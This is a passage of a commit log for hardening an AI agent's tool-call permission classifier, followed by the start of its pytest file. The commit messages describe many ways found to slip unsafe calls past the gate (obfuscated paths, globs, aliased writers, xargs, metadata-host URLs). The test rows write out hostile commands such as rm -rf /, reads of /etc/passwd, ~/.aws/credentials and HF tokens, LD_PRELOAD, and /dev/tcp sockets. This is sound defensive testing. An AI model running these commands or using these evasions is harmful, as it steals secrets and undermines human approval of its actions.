  "(" / ";" / end lookahead.
- GraphQL # comments are stripped before the mutation match, so
  mutation # note\n { deleteIssue(id: 1) } no longer hides the mutation.

Python auto-mode classification:
- numpy.memmap / open_memmap and pandas ExcelWriter / HDFStore create or
  truncate a file on construction, so they gate like open(..., "w").
- asyncio networking (asyncio.open_connection, loop.create_connection /
  create_server and unix variants) opens outbound connections/listeners
  the sandbox does not isolate, so it gates like socket.connect.

Terminal auto-mode: file -C / --compile writes a compiled magic database.

Routing:
- A JSON-schema response_format is guided-decoding passthrough, not a
  local tool loop, so a --enable-tools policy no longer 400s a
  non-streaming ask/auto structured-output request at the confirm guard.
- An explicit confirm_tool_calls=False opts out of the Anthropic Messages
  server-tool gate entirely (it wins over the mode, mirroring
  _permission_mode_confirm and the GGUF path), so it runs even under ask.

Adds regression rows/cases for each.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Track path-ctor aliases, exempt empty selection and safe safetensors card (round 33)

- Python auto mode now propagates path constructor / join aliases, so
  assigning Path or os.path.join to another local name is still folded:
  P = Path; (P('/etc') / 'passwd').read_text() and j = os.path.join;
  open(j('/etc', 'passwd')) ask, while a benign /tmp alias stays safe.
- _confirm_gate_needs_stream now distinguishes an omitted enabled_tools
  (None, all tools) from an explicit empty list ([], no tools). An empty
  selection runs no built-in tool and cannot prompt, so a non-streaming
  auto request with enable_tools=true, enabled_tools=[] is no longer
  400ed under a --enable-tools policy.
- The safetensors provisional render_html card now uses permission_mode:
  render_html is always safe and never prompts, so its early canvas card
  streams under auto (which ships confirm_tool_calls=true) instead of
  being suppressed, matching the GGUF path's is_always_safe_tool exemption.

Adds regression rows/cases for each.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Extend auto-mode classifier: SQLite mutations, more net/xattr/compressed writers

Additional fail-closed gaps found by a fresh adversarial pass, each with a
reproduction and a benign control:

- MCP read-named tools now ask on SQLite-flavored writes the base DML/DDL regex
  missed: ATTACH / DETACH DATABASE, a write-form PRAGMA (PRAGMA journal_mode=WAL
  / user_version=42 / foreign_keys(0), while the read-form PRAGMA journal_mode
  stays safe), and load_extension() which loads and runs an arbitrary shared
  library.
- Python auto mode now gates the remaining asyncio network entry points
  (start_server, open_unix_connection, loop.create_datagram_endpoint,
  sock_connect), os.setxattr / os.removexattr metadata writes, the gzip / bz2 /
  lzma single-stream writers (GzipFile / BZ2File / LZMAFile, mode-gated like
  ZipFile so a read stays safe), pandas to_xml, and the websockets client.

Benign controls (SELECT 1, read-form PRAGMA, asyncio.sleep, gzip read, numpy
read, natural-language "attach"/"analyze") stay safe. Regression rows added to
test_permission_mode.py.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Close follow-up auto-mode gaps: SQLite/GraphQL variants, more writers and net

A fresh adversarial pass on the previous round found consistent extensions of
the same fail-closed rules, each reproduced with a benign control:

- MCP read-named tools: DROP / ALTER now cover the same broad object set as
  CREATE (DROP FUNCTION, ALTER INDEX, DROP MATERIALIZED VIEW); ATTACH is caught
  without the optional DATABASE keyword via its quoted-path form; a
  schema-qualified write PRAGMA (PRAGMA main.user_version=1) is matched; and a
  GraphQL mutation carrying directives (mutation M @audit { ... }) is treated as
  a mutation.
- Python auto mode: os.startfile (Windows program launch), asyncio
  start_unix_server, and the socketserver framework now ask; a gzip/bz2/lzma
  open imported under an alias (from gzip import open as gopen) is gated like
  builtin open; and a dynamic path prefix that can form a sensitive absolute
  root (open(chr(47) + "etc/passwd"), open(os.sep + "etc/passwd")) is treated as
  sensitive, while a dynamic prefix with a benign suffix stays safe.

Benign controls (read-form PRAGMA, natural-language "attach ... as", "drop the
idea", SELECT dropped_at, query @cached, gzip read alias, dynamic prefix +
data/file suffix) stay safe. Regression rows added to test_permission_mode.py.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Gate GNU time -o, basicConfig/methodcaller/fileinput, and more SQL mutations

Another adversarial pass surfaced further consistent fail-closed gaps, each
reproduced with a benign control:

- Terminal: GNU time -o/--output/-a/--append truncate or append to a file with
  timing output; time is a wrapper, so the flag is checked before the wrapped
  command like env -C.
- Python auto mode: logging.basicConfig(filename=...) opens a log file for
  write; operator.methodcaller("write_text"/...) hides a writer method behind a
  string and is now treated as dynamic dispatch (like getattr/partial);
  fileinput.input(..., inplace=True) rewrites a file in place (the default read
  form stays safe).
- MCP read-named tools: UPDATE now matches quoted, bracketed, and
  schema-qualified targets (UPDATE "users" / public.users / ONLY public.users /
  [users] / `users` SET); SELECT ... INTO OUTFILE/DUMPFILE writes a server file;
  and state-changing SQL functions inside a SELECT (pg_terminate_backend,
  setval, pg_write_file, lo_export, ...) ask.

Benign controls (time ls / time -p, basicConfig(level=), methodcaller("upper"),
fileinput read, NL "update ... set", setval_col column, PL/pgSQL SELECT INTO
var) stay safe. Regression rows added to test_permission_mode.py.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Tighten auto-mode classifier comments

Collapse the multi-line rationale blocks in the permission classifier to one or
two lines each without dropping the exploit each branch closes. Comments and
whitespace only (no code change); the classifier tests are unchanged and pass.

* Retry transient SSE stalls in the tool-calling smoke probes

The tool-calling job flaked with a bare "TimeoutError: timed out": the
server-side python/bash probes stream over post_sse(), which (unlike
post()) had no transport-level retry, so a single stalled stream on a
shared CI runner hard-failed the whole step even though function calling
had already passed.

post_sse() now mirrors post(): a transport-level stall (stream open or a
mid-stream read timing out) is retried once with a fresh request capped
at 300s, while HTTP status errors still surface immediately. The
Linux _run_tool_probe caps each attempt at 360s and treats a stall that
outlives the retry as a failed attempt (rotate to the next seed) instead
of raising, and the web_search probe uses the same 360s cap. A genuine
server wedge still fails (the retry also times out), so real regressions
are not masked. Applied to the Linux, macOS, and Windows inference-smoke
workflows, which share the probe.

* Close five more auto-mode classifier gaps from review

Each reproduces with a benign control:

- Path constructor aliased through an attribute (P = pathlib.Path) now folds
  like the bare-name alias, so (P('/etc') / 'passwd').read_text() asks while a
  /tmp alias stays safe.
- Callable defaults that are not plain names now bind the parameter: an
  attribute writer (def f(s=np.save)), an archive constructor, a captured .open,
  and partial(open, mode='w') fold like the equivalent assignment; a benign
  default (np.mean) does not.
- A dynamic piece inside a sensitive name (open('/et' + chr(99) + '/passwd'),
  which folds to '/et\x00/passwd') now asks: the literals around each dynamic
  segment are matched against a credential target with the segment as any run of
  non-separator chars, so an all-dynamic ('1 + 1') or segment-spanning
  (a + '/' + b) path stays safe.
- MCP read-named tools now ask on REFRESH MATERIALIZED VIEW and REINDEX; a
  'refresh' column or natural-language 'refresh' stays safe.
- A writer/open alias handed to a higher-order invoker (map(open, names, modes),
  starmap(np.save, ...)) is gated even without a direct call site; a benign
  map(len, ...) is unaffected.

Regression rows added to test_permission_mode.py.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Default tool pills off on model load so tool execution is opt-in

resolveToolsEnabledOnLoad turned the web-search and code pills on for
any tool-capable model when the user had expressed no preference. Default
them off instead, so tool execution is enabled only when the person
clicks the pill to turn it on; a saved preference (on or off) is still
honoured, so a user who already enabled tools keeps them on.

* Gate mark/subscribe MCP verbs and qualified higher-order writer invokers

- A read-prefixed MCP tool name carrying mark / subscribe / unsubscribe
  (get_and_mark_read, get_and_subscribe) now asks; a 'mark' substring inside
  one token (list_bookmarks) stays safe.
- The higher-order writer check now also fires for a qualified invoker
  (itertools.starmap(open, ...), functools.reduce(open, ...)), matching the
  bare-name map/filter form; the writer-check on the first arg keeps a benign
  itertools.starmap(len, ...) or itertools.chain(...) safe.

Regression rows added to test_permission_mode.py.

* Close more auto-mode gaps and align the ask confirm fold across paths

Each classifier change reproduces with a benign control:

- MCP read-named tools now ask on reply / notify verbs (get_and_reply_email,
  list_and_notify_users), on catalog writes COMMENT ON / SECURITY LABEL / LOCK
  TABLE and CREATE|DROP|ALTER POLICY, and on state-changing PostgreSQL functions
  inside a read-shaped SELECT (nextval, set_config, pg_notify, the advisory-lock
  family). A 'comment' column, a 'locks' table, and a 'nextval' column prefix
  stay safe; the natural-language NOTIFY/SET ROLE statement forms are left out
  because SET/NOTIFY overlap ordinary prose.
- Python auto mode now gates loader.exec_module (runs a module's code), archive
  extractall (zip-slip file writes), the ensurepip / venv modules (install pip /
  build an environment), and pydoc.writedoc. The Hugging Face login token
  (~/.cache/huggingface/token and stored_tokens) is now a sensitive path, while
  the rest of that cache (model data) stays readable.
- ChatCompletionRequest no longer overwrites an explicit confirm_tool_calls=false
  when permission_mode='ask': the fold only self-enables the gate when the flag
  is unset, so an explicit opt-out wins on the chat path exactly as it already
  does via _permission_mode_confirm and the Anthropic pre-switch guard.

Regression rows added to test_permission_mode.py.

* Gate sort -T, xxd outfile positional, and the legacy HF token path

- sort -T / --temporary-directory writes spill files to a caller-chosen dir,
  so it joins -o / --output in sort's unsafe-flag set.
- xxd [infile [outfile]] writes its second positional, like uniq; xxd now uses
  the same second-positional-write handling (xxd in.bin out.hex asks, xxd
  in.bin and xxd -c 16 in.bin stay read-only).
- The sensitive-path regex now also covers the legacy ~/.huggingface/token
  location (optional leading dot), not just ~/.cache/huggingface/token; an
  unrelated dir like myhuggingface/token stays safe.

Regression rows added to test_permission_mode.py.

* Catch multi-char SQL mutation targets, globbed credential names, digit outfiles

Three fail-open gaps in the auto-mode classifier, each with a benign control:

- SQL: the trailing word boundary on the MCP mutation regex meant a bare \w
  stopped at the first character, so TRUNCATE users, GRANT SELECT ON t, and
  REVOKE ALL ON t (multi-character names) slipped through while single-letter
  targets matched. Match the whole identifier instead, and accept an explicit
  AS alias on UPDATE (UPDATE users AS u SET). The implicit-alias form is left
  out because it is indistinguishable from the prose "update <noun> <noun> set".
  A truncate_log column and a grants table stay safe.
- A glob that resolves to a credential basename anywhere (cat ~/.huggingface/tok?n
  -> token, cat proj/.netr? -> .netrc, cat repo/.aws/cred*) now asks; the fixed
  target list only covered a handful of home paths. notes/dra?t.txt and
  token_counts.tx? stay safe.
- uniq / xxd counted file positionals but skipped every numeric token to ignore
  a flag value, so a file literally named with digits (uniq 123 out) hid the
  output positional. Track each command's value-taking flags and consume only
  the value, so uniq -f 2 in stays safe while uniq 123 out asks.

Regression rows added to test_permission_mode.py.

* Isolate the permission-mode loop tests from process-global state

The loop-driving tests (auto/off/full/bypass) drove run_safetensors_tool_loop
against a process-global approval registry (state.tool_approvals._pending)
keyed by a single shared session id, and read os.environ. Other backend test
modules mutate both, some at import time, so in the full-suite ordering a stale
pending approval or a leaked env var could make the loop deny or skip a call
these tests expect to run. It passed when the file ran alone but failed only in
the complete tests/ run on CI.

Add an autouse fixture that snapshots and restores os.environ and the approval
registry around each test, and give every _drive call a unique session id so a
leaked approval can never collide. Attach a compact event-stream dump to the
loop assertions so any residual full-suite-only failure reports what the loop
actually did instead of a bare diff.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Studio: harden auto-mode classifier for recursive listers, sort file lists, aliased invokers, single-member extract

Close four fail-open gaps in is_potentially_unsafe_tool_call:
- terminal: tree/du (always recursive) and ls -R rooted at an absolute or
  tilde path now ask, matching the existing grep/rg/find recursive-read gate;
  relative walks stay safe.
- terminal: sort --files0-from=F reads the file list named in F, so it can
  read arbitrary host files indirectly; added to sort's unsafe flags.
- python: track aliases of the higher-order invokers (m = map;
  from itertools import starmap as sm) so an aliased invoker handed open/a
  writer is still gated; a benign callable (map(len, ...)) stays safe.
- python: single-member archive extract (ZipFile/TarFile.extract) writes to
  disk like extractall and is vulnerable to a crafted member path, so gate it.

Also update the stale _FakeExecuteTool in test_permission_mode.py to accept
the thread_id keyword that run_safetensors_tool_loop now forwards to
execute_tool after the main merge, which had broken the five tool-loop tests.

Adds regression rows covering each gap plus benign controls.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Studio: normalize unknown permission_mode to 'ask' instead of a 422

The request models validated permission_mode with Literal[ask, auto, off,
full], so an unrecognized value from a newer UI/client was rejected with a 422
before the tool loops could apply their unknown -> ask fallback
(safetensors_agentic.py:464, llama_cpp.py:9001). That made the intended
forward-compat degradation unreachable at the API boundary for both Chat
Completions and the analogous Anthropic field.

Accept a plain string on both ChatCompletionRequest and AnthropicMessagesRequest
and normalize in a before-validator: None stays unset, the four known modes pass
through, and any other value degrades to the safest gate ('ask'), matching the
loops. Adds a regression test covering unknown/None/known across both models.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Studio: close five more auto-mode classifier gaps

- terminal: xargs is no longer a safe wrapper. It appends arguments read from
  stdin that the scan never sees, so `echo -o out /etc/passwd | xargs sort`
  forwards to `sort -o out /etc/passwd` (a write + sensitive read) while only
  the allow-listed literals are visible. Any xargs command now asks.
- terminal: ionice -p/-P/-u change the I/O priority of an already running
  process / group / user instead of forwarding to a wrapped read-only command,
  so `ionice -c 3 -p <pid>` now asks. ionice -c 3 <cmd> stays safe.
- MCP: gate ALTER SYSTEM, which persists PostgreSQL server configuration and was
  not one of the DDL objects the mutation detector matched.
- MCP: a credential noun in a read-named tool (read_secret, list_tokens,
  get_credentials, fetch_api_key) is a sensitive disclosure, so it asks even
  without a mutating verb or a path/SQL argument. Scoped *_key nouns keep a
  primary_key / keyboard lookup safe.
- render_html: no longer unconditionally safe. A static canvas still auto-runs,
  but one whose HTML/JS reaches the network (fetch/WebSocket/remote script) asks,
  since it can egress under the canvas CSP when artifact network access is on.
  Its early provisional card is suppressed under the auto confirm gate, and the
  confirm-without-stream guard now requires a stream when render_html is
  selectable.

Adds regression rows and benign controls for each, and updates the render_html
provisional-card and confirm-gate tests to the new behavior.

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

* Studio: extend auto-mode gates for indirect file lists, dynamic lookups, HTML network loads, and Anthropic render_html

Follow-ups on the previous classifier round:

- terminal: wc/du/find --files0-from (and find's -files0-from primary) read a
  NUL-separated list of input paths from a file, the same indirect mechanism as
  sort --files0-from, so a crafted list reads arbitrary host files past the
  literal path/root checks. Gate them like sort.
- python: a namespace lookup through a dict-style call (f =
  __builtins__.__dict__.get('open'), globals().get('open'), vars(x).get(...))
  can return open/eval/a mutator, so poison the bound name like getattr/subscript
  lookups already are. An ordinary dict .get or os.environ.get stays safe.
- render_html: broaden the network detector so a canvas that loads a resource
  via CSS url()/@import, srcset, or a root-relative (/path) or protocol-relative
  (//host) src/href is treated as networked, not just fetch/WebSocket/remote
  script. Relative ./x and url(#id)/data: refs stay static/safe.
- Anthropic /v1/messages: drop render_html from the unprompted-safe server-tool
  set. Since it can prompt (networked canvas) and this channel invokes the loop
  without confirm, selecting it under ask/auto/omitted now rejects like
  terminal/python; off/full (or an explicit confirm opt-out) run it.

Adds regression rows and benign controls for each, plus an Anthropic route test.

* Studio: close six more auto-mode classifier gaps

- terminal: a glob that expands to a project .env (cat .e?v) now asks; .env
  joins the sensitive glob-basename set, matching the literal-path gate.
- python: an open bound onto an attribute (box.f = open; box.f('out','w'))
  is tracked by attribute name, and open invoked via .__call__
  (open.__call__('out','w'), unwrapped to the underlying callable) is gated,
  so neither slips past the name-based open-alias checks. Benign attribute
  callables and .__call__ on non-writers stay safe.
- python: a namespace lookup via .get/.pop/.setdefault already covered the
  builtins case; unchanged here.
- MCP: a mutating HTTP verb in a method/verb argument (get_url
  {"method": "DELETE"|"POST"|"PUT"|"PATCH"}) now asks, so a generic HTTP
  tool cannot mutate an external service unprompted; GET/HEAD stay safe.
- MCP: a credential/secret environment-variable value (get_env
  {"name": "OPENAI_API_KEY"}) is treated as a sensitive read via the same
  credential-noun match used for tool names; PATH/HOME stay safe.
- render_html: self-navigation sinks (location.assign/replace, window.open,
  assigning a URL to (window.)location(.href)) join the network detector, so a
  canvas that navigates itself to an external URL asks; location.reload() /
  history.back() stay static.

Adds regression rows and benign controls for each.

* Studio: gate obfuscated canvas egress, sensitive-dir iteration, and MCP metadata-host reads

- render_html: strip block comments before the network scan so fetch/*x*/(...)
  cannot hide egress, and match bracket-access forms (window['fetch'](...),
  self['open'](...)). Line // comments are left alone so the // in an https URL
  is not eaten. A comment-only canvas stays static.
- python: enumerating a directory outside the sandbox (Path('/etc').iterdir(),
  os.scandir('/etc'), os.listdir('/home'), os.walk('/')) reads host filenames
  the direct /etc/passwd checks would prompt for, so gate it when the target dir
  folds to an absolute/tilde/sensitive path; a relative dir stays safe and an
  unresolved dynamic dir is left to other checks.
- MCP: a read-named HTTP tool pointed at a cloud-metadata / link-local host
  (fetch_url {"url": "http://169.254.169.254/..."}, metadata.google.internal)
  reads instance credentials, so classify those URL arguments as sensitive,
  mirroring the sandbox SSRF blocklist; ordinary and localhost URLs stay safe.

Adds regression rows and benign controls for each.

* Studio: gate meta-refresh navigation, pandas HTML/markdown exporters, absolute glob roots, and checksum verify mode

* Studio: gate starred open writes, builtins.__import__, computed render_html sinks, and procfs fd reads in auto mode

* Studio: gate remote worker canvases, huggingface_hub downloads, and write callables passed to user helpers in auto mode

* [pre-commit.ci] auto fixes from pre-commit.com hooks

for more information, see https://pre-commit.ci

---------

Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
Co-authored-by: Unsloth <michaelhan@Michaels-MacBook-Pro.local>
Co-authored-by: Daniel Han <danielhanchen@gmail.com>
2026-07-15 06:07:21 -07:00

1594 lines
82 KiB
Python

# SPDX-License-Identifier: AGPL-3.0-only
# Copyright 2026-present the Unsloth AI Inc. team. All rights reserved. See /studio/LICENSE.AGPL-3.0
"""Tests for permission_mode ("Ask for approval" / "Approve for me" /
"Off" / "Full access") permission levels.
Covers the auto-mode safety classifier in tools.py and the loop-level
behavior of run_safetensors_tool_loop: in "auto" mode only calls detected
as potentially unsafe pause for confirmation, in "full" mode nothing
pauses and the sandbox is dropped, and unset/unknown modes behave as
"ask" (every call pauses when confirm_tool_calls is on).
"""
import os
import uuid
import pytest
from core.inference.mcp_client import MCP_TOOL_PREFIX
from core.inference.safetensors_agentic import run_safetensors_tool_loop
from core.inference.tools import is_potentially_unsafe_tool_call
from models.inference import AnthropicMessagesRequest, ChatCompletionRequest
from state import tool_approvals
from state.tool_approvals import resolve_tool_decision
_SESSION = "perm-mode-session"
@pytest.fixture(autouse = True)
def _isolate_permission_mode_globals():
"""Keep the loop-driving tests hermetic against process-global state that
leaks across the full backend suite.
``run_safetensors_tool_loop`` reads a process-global approval registry
(``state.tool_approvals._pending``) and honors ``os.environ``. Other test
modules mutate both (module-level ``os.environ[...] = ...`` runs at import
time; abandoned approvals can survive a test). A stale entry keyed by the
shared session id, or a leaked env var, can make the loop deny or skip a
call that these tests expect to run, which only surfaces in the full-suite
ordering on CI (not when the file runs alone). Snapshot and restore both,
and hand every ``_drive`` call a unique session, so each test starts clean.
"""
env_snapshot = dict(os.environ)
with tool_approvals._lock:
pending_snapshot = dict(tool_approvals._pending)
tool_approvals._pending.clear()
try:
yield
finally:
with tool_approvals._lock:
tool_approvals._pending.clear()
tool_approvals._pending.update(pending_snapshot)
os.environ.clear()
os.environ.update(env_snapshot)
@pytest.fixture(autouse = True)
def _clear_pending():
with tool_approvals._lock:
tool_approvals._pending.clear()
yield
with tool_approvals._lock:
tool_approvals._pending.clear()
# ── classifier ──────────────────────────────────────────────────────
@pytest.mark.parametrize(
("command", "unsafe"),
[
("ls -la", False),
("cat foo.txt | grep hello", False),
("find . -name '*.py' | head -5", False),
("env FOO=1 grep -r pattern .", False),
("echo hi > out.txt", True), # write redirection
("rm -rf /", True),
("ls; rm x", True), # unsafe after separator
("xargs rm", True), # xargs is not a safe wrapper: it injects stdin args
("xargs sort", True), # forwards to sort with unscanned stdin arguments
("echo -o out x | xargs sort", True), # hidden write via stdin-supplied args
("find . -name '*.py' | xargs grep foo", True), # xargs run stays gated
("ionice -c 3 -p 1234", True), # -p changes a running process's IO priority
("ionice -p 1", True),
("ionice -P 999", True), # -P targets a process group
("ionice -u 1000", True), # -u targets a user's processes
("ionice -c3 -p1234", True), # attached short flags still target a process
("ionice -c 3 ls", False), # a real wrapped command stays safe
("ionice -n 5 grep x .", False), # class-data flag then wrapped read stays safe
("sudo ls", True),
("git push origin main", True),
("pip install requests", True),
("echo `whoami`", True), # substitution fails closed
("python -c 'print(1)'", True), # arbitrary code
("find . -exec rm {} ;", True), # find can execute
("find . -delete", True), # find can delete
("fd -x rm", True), # fd runs a command per result
("fd --exec-batch rm", True),
("fd -e py pattern", False), # plain fd search stays read only
("sort -o out.txt in.txt", True), # -o writes a file
("sort --output=out in", True),
("sort --compress-program=sh big.txt", True), # runs an external program
("sort -T ./scratch large.txt", True), # -T writes temporaries to a chosen dir
("sort --temporary-directory=./s big.txt", True),
("sort in.txt", False), # plain sort stays read only
("rg --pre sh needle f.sh", True), # rg preprocessor runs a command
("rg --pre=/tmp/x needle .", True),
("rg --hostname-bin /tmp/x foo .", True),
("rg --pre-glob '*.txt' needle .", False), # glob filter stays read only
("rg needle .", False), # plain rg stays read only
("/tmp/cat secrets", True), # path-qualified command is an arbitrary binary
("./ls -la", True),
("env /tmp/cat x", True), # path-qualified target after a wrapper
("tree -o out.txt", True), # -o writes a file
("time -o /tmp/r ls", True), # GNU time -o truncates a file
("time --output=/tmp/r ls", True), # GNU time long output flag
("command time -o/tmp/result cat /dev/null", True), # attached, behind command
("time -a log.txt ls", True), # GNU time append flag
("time ls", False), # plain time wrapper stays safe
("time -p ls", False), # POSIX time -p (no file) stays safe
("xxd -r dump.hex out.bin", True), # -r can write
("xxd input.bin dump.hex", True), # 2nd positional is the outfile
("xxd -c 16 in.bin out.hex", True), # outfile past a numeric flag value
("xxd input.bin", False), # single positional reads to stdout
("xxd -c 16 input.bin", False), # flag value is not a second file
("xxd 42 99", True), # digit-named outfile positional still counts
("xxd -s 0x10 input.bin", False), # seek value is not a second file
("awk '{print}' file", True), # awk can system()/write
("grep -o x file", False), # grep -o is stdout only
("ls\nrm -rf x", True), # newline separates commands
("ls\r\nrm x", True), # CRLF separates commands
("ls\n\n\nrm x", True), # blank lines collapse to one separator
("ls\npwd", False), # multi-line stays safe when every line is
("ls\n", False),
("sort -o/tmp/out /tmp/in", True), # attached short output flag
("sort -uo out.txt in.txt", True), # -o bundled in a short cluster
("sort -bo out in", True),
("sort -u in.txt", False), # cluster without a write flag stays safe
("find . \\( -name x -delete \\)", True), # -delete inside a group
("cat ../../.ssh/id_rsa", True), # parent traversal read
("cat ~/.aws/credentials", True), # credential path
("cat /home/a/.azure/msal_token_cache.json", True), # azure token store
("cat ~/.config/gh/hosts.yml", True), # gh cli credentials
("cat ~/.config/app/settings.json", False), # ordinary config stays safe
("cat /home/alice/.cache/huggingface/token", True), # HF login token
("cat ~/.cache/huggingface/stored_tokens", True), # HF multi-token store
("cat /home/alice/.huggingface/token", True), # legacy HF token location
("cat /home/alice/myhuggingface/token", False), # unrelated dir stays safe
(
"cat /home/alice/.cache/huggingface/hub/models--x/config.json",
False,
), # HF model cache is not a credential
("cat /run/secrets/hf_token", True), # docker secret mount
("cat /var/run/secrets/kubernetes.io/serviceaccount/token", True), # k8s mount
("cat /run/app.pid", False), # ordinary /run file stays safe
("cat /etc/passwd", True), # sensitive system file
("cat /proc/self/environ", True), # procfs env dump
("cat /proc/1/cmdline", True),
("head /proc/self/maps", True),
("cat /proc/self/fd/3", True), # procfs fd symlink to an open file
("cat /proc/1234/task/1234/fd/3", True), # per-thread fd symlink
("LD_PRELOAD=/tmp/hook.so ls", True), # code-loading env prefix
("PATH=. ls", True), # command-lookup env prefix
("IFS=x ls", True),
("FOO=1 grep -r x .", False), # benign env prefix stays safe
("ps auxe", True), # ps can dump process env; not on the safe list
("ps aux", True),
("cd /; cat etc/passwd", True), # cd escapes the workdir
("cd subdir; ls", True), # cd is no longer auto-approved
("env --chdir=/ cat etc/passwd", True), # env -C escapes the workdir
("env -S 'sh -c id' true", True), # env --split-string builds a command
("env FOO=1 grep -r x .", False), # benign env wrapper stays safe
("cat /etc//passwd", True), # redundant slashes resolve to /etc/passwd
("cat /etc/./passwd", True),
("p=/etc; cat $p/passwd", True), # path split across an assignment
("d=/etc; cat ${d}/shadow", True),
("FOO=1 echo $FOO", False), # benign variable expansion stays safe
("cat /proc/$PPID/enviro''n", True), # quote-split procfs read
("cat /proc/self/'environ'", True),
('p="/proc/$PPID"; cat $p/environ', True), # quoted+nested var procfs
("LESSOPEN='|touch x; cat %s' less f.txt", True), # less input preprocessor
("less file.txt", True), # less pager escapes (+cmd, !shell, -o) so it asks
("less '+!touch pwned' notes.txt", True), # less +command runs a shell command
("more file.txt", True), # more shares the !shell pager escape
("cat /proc/cpuinfo", False), # non-sensitive procfs read stays safe
("cat /e??/passwd", True), # glob expands to /etc/passwd
("cat /e[t]c/passwd", True), # bracket class hides etc
("head /etc/shado?", True),
("cat /et\\c/passwd", True), # backslash escape hides /etc/passwd
("cat /etc/pass\\wd", True),
("ls *.py", False), # benign glob stays safe
("head data?.txt", False),
("grep -R TOKEN /home", True), # recursive search escapes the workdir
("rg TOKEN /", True),
("fd pattern /etc", True),
("grep -r foo src/", False), # sandbox-relative search stays safe
("rg TOKEN .", False),
("tree /home", True), # always-recursive walker escapes onto host files
("du /", True), # disk-usage walk of the whole host root
("du -sh /home", True), # summarized host-home walk still recurses
("ls -R /home", True), # ls recurses with -R onto host files
("ls -R /etc", True),
("ls -laR /", True), # -R inside a short cluster still recurses
("tree .", False), # cwd walk stays in the sandbox
("tree ./project", False), # relative walk stays safe
("du -sh", False), # du with no path defaults to cwd
("du -sh ./build", False), # relative disk-usage stays safe
("ls -R subdir", False), # relative recursive listing stays safe
("ls -la /home", False), # non-recursive listing of one level stays here
("sort --files0-from=list.txt", True), # reads an indirect file list
("sort --files0-from list.txt", True), # separate-value form
("sort -u data.txt", False), # ordinary sort stays read only
("wc --files0-from=list", True), # wc reads an indirect file list too
("wc --files0-from list", True),
("du --files0-from=list", True), # du indirect file list
("find -files0-from list", True), # find primary reading a file list
("wc file.txt", False), # ordinary wc stays read only
("wc -l data.txt", False), # counting flag stays read only
("cat logs/app.log", False), # ordinary relative read
("cat /r?n/secrets/hf_token", True), # glob into a secret mount
("cat /var/r?n/secrets/db", True),
("cat /root/.s??/id_rsa", True), # glob into a credential dir
("cat ~/.huggingface/tok?n", True), # glob resolves to a credential basename
("cat proj/.netr?", True), # glob resolves to .netrc anywhere
("cat repo/.aws/cred*", True), # glob resolves to credentials anywhere
("cat backup/id_rs?", True), # glob resolves to id_rsa anywhere
("cat .e?v", True), # glob resolves to a project .env secret
("cat proj/.en?", True), # .env anywhere via a glob
("cat notes/dra?t.txt", False), # benign globbed basename stays safe
("cat data/token_counts.tx?", False), # 'token' prefix basename stays safe
("ls /home/*/projects", False), # benign glob not into a cred dir
("grep -R TOKEN ~root", True), # tilde-user recursive root escapes
("grep -R TOKEN ~/logs", True), # tilde-home recursive root escapes
("cat /etc/pass{w,}d", True), # brace expansion builds /etc/passwd
("cat report{1,2}.txt", False), # benign brace stays safe
("cat /e{t,}c/pass?d", True), # brace-expanded candidate then a glob resolves it
("cat /et{c,}/pass?d", True), # brace + glob in the tail
("cat repo/d{1,2}/f?.txt", False), # benign brace + glob stays safe
("cat /etc/pass${x:-wd}", True), # default param expansion builds path
("cat /etc/pass${x:=wd}", True),
("echo ${x:-hello}", False), # benign default param stays safe
("cat </e??/passwd", True), # redirection prefix hides the glob
("cat <../../notes", True), # redirection with no space escapes workdir
("cat notes.txt", False), # ordinary read stays safe
("p=/; grep -R TOKEN $p", True), # recursive root hidden in an assignment
("p=/home; grep -R TOKEN $p", True),
("p=src; grep -R TOKEN $p", False), # relative assigned root stays safe
("cat /etc/pass{w..w}d", True), # sequence brace builds /etc/passwd
("cat /etc/pass{v..x}d", True), # sequence brace range spans passwd
("cat file{1..3}.txt", False), # benign sequence brace stays safe
("p=passwd; cat /etc/${p:0:6}", True), # substring expansion builds path
("p=hello; cat notes/${p:0:3}", False), # benign substring stays safe
("cat $'/etc/pass\\x77d'", True), # ANSI-C escape hides /etc/passwd
("cat $'notes.txt'", False), # benign ANSI-C quote stays safe
("cat /home/*/.az?re/msal_token_cache.json", True), # azure token glob
("cat /home/*/.config/g?/hosts.yml", True), # gh config glob
("cat /home/*/projects/readme", False), # benign home glob stays safe
("cat /proc/$PPID/task/$PPID/environ", True), # per-thread proc env alias
("cat /proc/cpuinfo", False), # non-sensitive proc read stays safe
("grep -R TOKEN ${root:-/home}", True), # default-param recursive root
("grep -R TOKEN ${root:-src}", False), # relative default root stays safe
("p=passXd; cat /etc/${p/X/w}", True), # pattern replacement builds path
("p=passXd; cat /etc/${p//X/w}", True), # global pattern replacement
("p=hello; cat notes/${p/l/L}", False), # benign replacement stays safe
("p=PASSWD; cat /etc/${p,,}", True), # case-lower expansion builds path
("p=hello; cat notes/${p,,}", False), # benign case expansion stays safe
("f=-delete; find . $f", True), # find action hidden behind an assignment
("g=e??; cat /$g/passwd", True), # glob assembled through an assignment
("g=abc; cat /$g/readme", False), # benign assigned path stays safe
("cat /etc/pass[[:lower:]]d", True), # POSIX class glob builds /etc/passwd
("x=passwd; p=x; cat /etc/${!p}", True), # indirect expansion builds path
("x=notes; p=x; cat /home/${!p}", False), # benign indirect expansion stays safe
("cat </dev/tcp/example.com/80", True), # bash /dev/tcp opens a socket
("cat < /dev/udp/1.2.3.4/53", True), # bash /dev/udp opens a socket
("cat /dev/null", False), # ordinary /dev file stays safe
("cat /etc/ssh/ssh_host_ed25519_key", True), # ssh host private key read
("cat /etc/ssh/sshd_config", True), # whole /etc/ssh dir is sensitive
("cat /etc/hostname", False), # non-key /etc read stays safe
